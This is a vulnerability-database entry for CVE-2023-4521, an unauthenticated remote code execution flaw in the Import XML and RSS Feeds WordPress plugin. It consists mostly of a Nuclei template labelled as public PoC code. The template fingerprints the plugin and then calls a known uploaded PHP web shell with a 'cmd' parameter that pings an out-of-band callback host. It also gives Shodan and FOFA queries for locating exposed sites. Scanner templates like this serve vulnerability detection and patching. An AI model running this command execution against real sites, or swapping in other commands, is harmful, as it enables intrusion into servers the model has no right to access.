漏洞描述
The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
CVE-2023-4521: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
PoC代码[已公开]
id: CVE-2023-4521
info:
name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
author: princechaddha
severity: critical
description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
impact: |
Allows unauthenticated attackers to execute arbitrary code on the target system.
remediation: |
Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-4521
epss-score: 0.91709
epss-percentile: 0.9967
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: mooveagency
product: "import_xml_and_rss_feeds"
framework: wordpress
shodan-query: "http.html:\"import-xml-feed\""
fofa-query: "body=\"import-xml-feed\""
tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Import XML and RSS Feeds'
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4a0a0047304502201580e3f7824c273875537c1a533209ed7490bbf850a012d08fe22965e2feaf9f022100efea14a7f2ba663ac12df3c416d74f4ad01b035280eccbccb9dc5c705f758860:922c64590222798bb761d5b6d8e72950